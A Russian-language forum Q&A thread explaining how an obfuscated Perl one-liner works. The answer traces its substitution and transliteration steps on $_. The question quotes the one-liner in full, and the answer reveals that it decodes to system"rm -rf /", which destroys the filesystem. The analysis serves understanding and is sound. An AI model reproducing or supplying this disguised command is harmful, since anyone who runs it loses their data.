Как тут осуществляется неявная модификация переменной?

Question

[sudo rm -rf /]

Приветствую! Пишу вам прямиком из 2003!
Недавно наткнулся на просторах этого вашего на строчку

cat "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Что оно делает и как это работает ясно. Единственное, чего я не могу понять, как работает неявная модификация $_, появляющаяся явно только в 3 комманде для исполнения результата.

Не могди бы объяснить?

Comments

[Saboteur]

$_ это переменная по умолчанию. Если какая-то команда возвращает значение и переменная не указана, значит оно будет в $_
https://perlmaven.com/the-default-variable-of-perl

Для перла это - явно.

[sudo rm -rf /]

Saboteur: понятно, большое спасибо.

P.S. А почему не ответом?

[Saboteur]

разве ж ответ, так мелкий комментарий =)

Answer 1

[Владимир Варламов]

Итак мы спускаемся внизу по коду, отбрасываем всё лишнее как в этой статье ( https://www.dlitz.net/stuff/malicious-perl-sig/ ) и концентрируемся на строчках:

s;;=]=>%-{<-|}<&|`{;;
y; -/:-@[-`{-};`-{/" -;;

В первой строчке выполняется простая модификация-присвоение по аналогии замены пустоты на сожержимое (s//text/), где разделитель ";", а ";" в конце строки это конец команды.
Итак мы получили $_ равной =]=>%-{<-|}<&|`{

Далее идет оператор "y", он же tr.
Магия постороена на диапазонах. Разберем первый диапазон " -/" заменяется на "`-{". Если открыть таблицу ASCII, то хорошо видно что первый диапазон соответсвует всем символам:

а заменяется он на диапазон "скрывающий" значимый алфавит:


Тоже самое c остальными диапазонам символов. Разберите это уже сами :)
А в итоге получается, конечно, system"rm -rf /"